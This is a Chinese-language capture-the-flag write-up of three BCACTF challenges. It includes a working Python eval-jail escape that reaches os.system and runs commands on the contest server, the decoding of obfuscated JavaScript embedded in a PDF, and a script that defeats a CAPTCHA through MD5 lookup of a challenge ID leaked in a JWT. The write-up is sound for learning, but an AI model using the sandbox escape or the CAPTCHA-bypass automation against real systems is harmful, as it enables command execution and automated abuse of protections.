BCACTF

写在前面

国外的赛题还是挺有趣的，更偏脑洞一些。正值期末周，简单写两题当作娱乐放松了~。

MathJail - misc

描述

Just a fun python calculator! Good for math class.

解题

查看附件，如下。

print("Welcome to your friendly python calculator!")
equation = input("Enter your equation below and I will give you the answer:\n")
while equation!="e":
    answer = eval(equation, {"__builtins__":{}},{})
    print(f"Here is your answer: {answer}")
    equation = input("Enter your next equation below (type 'e' to exit):\n")
print("Goodbye!")

考点为删除了__builtins__的pyjail。参考 https://xz.aliyun.com/t/12647?time__1311=mqmhDvqIrrGNDQtiQGkI5YxWuFxjoOTD#toc-22 ，使用继承链条来绕过。

┌──(kali㉿kali)-[~/桌面]
└─$ nc challs.bcactf.com 31289

Welcome to your friendly python calculator!
Enter your equation below and I will give you the answer:
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")
flag.txt
pycalculator.py
ynetd
ynetd.c
Here is your answer: 0
Enter your next equation below (type 'e' to exit):
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("cat flag.txt")
bcactf{math_is_so_difficult_right?8943yfg09whgh3r89ghwerp}Here is your answer: 0

magic - foren

描述

I found this piece of paper on the floor. I was going to throw it away, but it somehow screamed at me while I was holding it?!

hints: the pdf should be interactive; if not, try changing your pdf viewer

附件

https://arcs-s3-repo.nyc3.cdn.digitaloceanspaces.com/magic/magic.pdf

解题

打开magic.pdf，发现可交互，推测内嵌了JavaScript脚本。
使用Acrobat pdf reader打开，提取出一串混淆过的JavaScript代码。

1
2

var _thereisdjs=true;
    (function(_0x18b13a,_0x4d582d){var _0x3da883=_0x4113,_0x1d0353=_0x18b13a();while(!![]){try{var _0x10c45c=parseInt(_0x3da883(0x1be))/0x1*(-parseInt(_0x3da883(0x1cc))/0x2)+parseInt(_0x3da883(0x1c2))/0x3+parseInt(_0x3da883(0x1c6))/0x4*(parseInt(_0x3da883(0x1c7))/0x5)+-parseInt(_0x3da883(0x1cb))/0x6*(parseInt(_0x3da883(0x1c1))/0x7)+-parseInt(_0x3da883(0x1ca))/0x8+parseInt(_0x3da883(0x1c0))/0x9+parseInt(_0x3da883(0x1c4))/0xa*(parseInt(_0x3da883(0x1bf))/0xb);if(_0x10c45c===_0x4d582d)break;else _0x1d0353['push'](_0x1d0353['shift']());}catch(_0x53c9c0){_0x1d0353['push'](_0x1d0353['shift']());}}}(_0x43c8,0xe20be));function _0x4113(_0x44cfd2,_0x23b14b){var _0x43c873=_0x43c8();return _0x4113=function(_0x4113e1,_0x43c2ed){_0x4113e1=_0x4113e1-0x1bd;var _0x2522f0=_0x43c873[_0x4113e1];return _0x2522f0;},_0x4113(_0x44cfd2,_0x23b14b);}function _0x43c8(){var _0x1355d8=['getField','charCodeAt','100554TvjbzQ','11jHxsKn','7564617EnopjV','2219BJkXWe','3372363teHOVr','alert','5165870pcLTuS','producer','32KYViix','925835vZTXso','Flag is incorrect!','length','8132288HsoZUP','13494jFFdda','26rtwUNT'];_0x43c8=function(){return _0x1355d8;};return _0x43c8();}function update(){var _0x3d0e72=_0x4113,_0x2923fd=this[_0x3d0e72(0x1cd)]('A')['value'],_0x12e8ec=[];for(var _0x28002d=0x0;_0x28002d<_0x2923fd[_0x3d0e72(0x1c9)];_0x28002d++){_0x12e8ec['push'](_0x2923fd[_0x3d0e72(0x1bd)](_0x28002d)^parseInt(info[_0x3d0e72(0x1c5)])%(0x75+_0x28002d));}k=[0x46,0x2d,0x62,0x11,0x6b,0x4c,0x72,0x5f,0x76,0x38,0x19,0x28,0x5f,0x31,0x36,0x63,0xf7,0xb1,0x69,0x2a,0x18,0x5e,0x36,0x1,0x37,0x3a,0x1c,0x5,0x11,0x56,0xe5,0x7b,0x64,0x2c,0x11,0x14,0x53,0x5a,0x35,0x17,0x41,0x62,0x3];if(_0x12e8ec['length']!=k[_0x3d0e72(0x1c9)]){app[_0x3d0e72(0x1c3)](_0x3d0e72(0x1c8));return;}for(var _0x28002d=0x0;_0x28002d<k[_0x3d0e72(0x1c9)];_0x28002d++){if(_0x12e8ec[_0x28002d]!=k[_0x28002d]){app[_0x3d0e72(0x1c3)](_0x3d0e72(0x1c8));return;}}app[_0x3d0e72(0x1c3)]('Flag is correct!');}

发现代码分为两部分，一部分为混淆加密字段的解密，另一部分update()为flag验证函数。

通过本地调试 + 调用解密函数可以大致还原update()的面貌。

function update() {
    input = this.getField('A')['value'], ans = [];
    for (var i = 0; i < input.length(); i++) {
        ans['push'](input.charCodeAt(i) ^ parseInt(info['producer']) % (117 + i));
    }
    k = [
        70, 45, 98, 17, 107, 76, 114, 95, 118, 56, 25, 40, 95, 49, 54, 99, 247, 177, 105, 42, 24, 94, 54, 1, 55, 58, 28, 5, 17, 86, 229, 123, 100, 44, 17, 20, 83, 90, 53, 23, 65, 98, 3
    ];
    if (ans['length'] != k.length()) {
        app.alert('Flag is incorrect!');
        return;
    }
    for (var i = 0; i < k.length(); i++) {
        if (ans[i] != k[i]) {
            app.alert('Flag is incorrect!');
            return;
        }
    }
    app.alert('Flag is correct!');
}

根据解密后的代码，已经知道了大概的逻辑，其中还有一个parseInt(info['producer'])待解决。用010 hexEditor 打开这个文件。搜索producer可以找到这样一串明文信息。

42 0 obj
<<
/Author()/Title()/Subject()/Creator()/Producer(\376\377\0002\0008\0003\0005\0004\0008\0008\0009\0003\0002\0007\0004)/Keywords()
/CreationDate (D:20240528134825-04'00')
/ModDate (D:20240528134825-04'00')
/Trapped /False
/PTEX.Fullbanner (This is pdfTeX, Version 3.141592653-2.6-1.40.26 (TeX Live 2024/Arch Linux) kpathsea version 6.4.0)
>>
endobj

询问gpt得知Producer字段的内容是283548893274。故update()完整代码如下：

function update() {
    input = this.getField('A').value, ans = [];
    for (var i = 0; i < input.length(); i++) {
        ans.push(input.charCodeAt(i) ^ 283548893274 % (117 + i));
    }
    k = [
        70, 45, 98, 17, 107, 76, 114, 95, 118, 56, 25, 40, 95, 49, 54, 99, 247, 177, 105, 42, 24, 94, 54, 1, 55, 58, 28, 5, 17, 86, 229, 123, 100, 44, 17, 20, 83, 90, 53, 23, 65, 98, 3
    ];
    if (ans.length() != k.length()) {
        app.alert('Flag is incorrect!');
        return;
    }
    for (var i = 0; i < k.length(); i++) {
        if (ans[i] != k[i]) {
            app.alert('Flag is incorrect!');
            return;
        }
    }
    app.alert('Flag is correct!');
}

使用kmod283548893274 % (117 + i)得到原始flag

k = [
    70, 45, 98, 17, 107, 76, 114, 95, 118, 56, 25, 40, 95, 49, 54, 99,
    247, 177, 105, 42, 24, 94, 54, 1, 55, 58, 28, 5, 17, 86, 229, 123,
    100, 44, 17, 20, 83, 90, 53, 23, 65, 98, 3
]
flag = ''
for i in range(len(k)):
    char_code = k[i] ^ 283548893274 % (117 + i)
    flag += str(chr(char_code))
print(flag)

Fogblaze

描述

Can you bypass this website’s new stateless CAPTCHA system?

Hints: The challengeId for “SCLN” would be 1e8298221a767bb37c01eb0cc61d1775

解题

进入网站后，发现需要验证码。
开启抓包，大写输入验证码后进入到一级目录。

抓包结果有两种类型的包。一种是初始化验证码。

POST /captcha HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: no-cache
Content-Length: 15
DNT: 1
Host: challs.bcactf.com:30311
Origin: http://challs.bcactf.com:30311
Pragma: no-cache
Proxy-Connection: keep-alive
Referer: http://challs.bcactf.com:30311/captcha?destination=/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
content-type: application/json

{"routeId":"/"}

返回的内容为captchaToken - 验证码token, image - 验证码图片base64, solved - 已解出题数, total - 总共题数, done - 是否通关

{
    "captchaToken": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYXB0Y2hhSWQiOiI5YTYxN2M3Mi1iZjg4LTQ0OTAtODhiMi1jNzUxNTA2NDQ5MjEiLCJyb3V0ZUlkIjoiLyIsImNoYWxsZW5nZUlkIjoiODZjOWNmNGUzNWViMDlkZGJkMWI4OGFkNTI0YmMwMmYiLCJzb2x2ZWQiOjAsInRvdGFsIjoyLCJkb25lIjpmYWxzZSwiaWF0IjoxNzE4MDI4NTM5LCJleHAiOjE3MTgwMjg1OTl9.FNLAdC0D0ltnSnZWkwUSkyyA3oB0Hag6afygwAAOc30",
    "image": ""data:image/png;base64,iVBORw0KGgoAAAAN....",
    "solved": 0,
    "total": 2,
    "done": false
}

另一种是解题数据包，请求头与上一种相同，但payload为

{"captchaToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYXB0Y2hhSWQiOiI5YTYxN2M3Mi1iZjg4LTQ0OTAtODhiMi1jNzUxNTA2NDQ5MjEiLCJyb3V0ZUlkIjoiLyIsImNoYWxsZW5nZUlkIjoiODZjOWNmNGUzNWViMDlkZGJkMWI4OGFkNTI0YmMwMmYiLCJzb2x2ZWQiOjAsInRvdGFsIjoyLCJkb25lIjpmYWxzZSwiaWF0IjoxNzE4MDI4NTM5LCJleHAiOjE3MTgwMjg1OTl9.FNLAdC0D0ltnSnZWkwUSkyyA3oB0Hag6afygwAAOc30","word":"BEGI"}

需要captchaToken和word。

进入到一级目录后，尝试访问The Flag，发现还是需要验证码，而且数量高达75个。

~~先试试人工打码，结果出现了时间限制。~~
~~尝试使用ddddocr，但是识别率堪忧，而且只要中间出错，就要重新来。~~
这时候回头看了眼提示，发现1e8298221a767bb37c01eb0cc61d1775是SCLN的md5值，而且在token的第二部分，是题目相关信息的base64，其中就包含了challengeId。

接下来生成爆破字典以及写写自动化脚本。

import hashlib

with open("./hashes.txt", "w") as f:
    for i in range(26):
        for j in range(26):
            for k in range(26):
                for l in range(26):
                    s = chr(i + 65) + chr(j + 65) + chr(k + 65) + chr(l + 65)
                    f.write(s + " " + hashlib.md5(s.encode()).hexdigest() + "\n")

import requests, json, base64, tqdm

url = "http://challs.bcactf.com:30311/captcha"
route = "/flag"

# 初始化，获取token
headers = {"content-type": "application/json", "Connection": "Keep-Alive"}
session = requests.Session()
response = session.post(url, data=json.dumps({"routeId": route}), headers=headers)
data = json.loads(response.text)
token = data["captchaToken"]
total = data["total"]


def solve(token, word):
    payload = json.dumps({"captchaToken": token, "word": word})
    response = session.post(url, headers=headers, data=payload)
    data = json.loads(response.text)
    token = data["captchaToken"]
    return token


hashes = {}
with open("./hashes.txt", "r") as f:
    for line in f:
        word, md5 = line.replace("\n", "").split(" ")
        hashes[md5] = word


for i in tqdm.tqdm(range(total)):
    # 末尾加上=补齐
    challengeInfo = base64.standard_b64decode(token.split(".")[1] + "===")
    word = hashes[json.loads(challengeInfo)["challengeId"]]
    token = solve(token, word)
# print("Here you are:", token)
print(f"[Flag] : http://challs.bcactf.com:30311{route}?token={token}")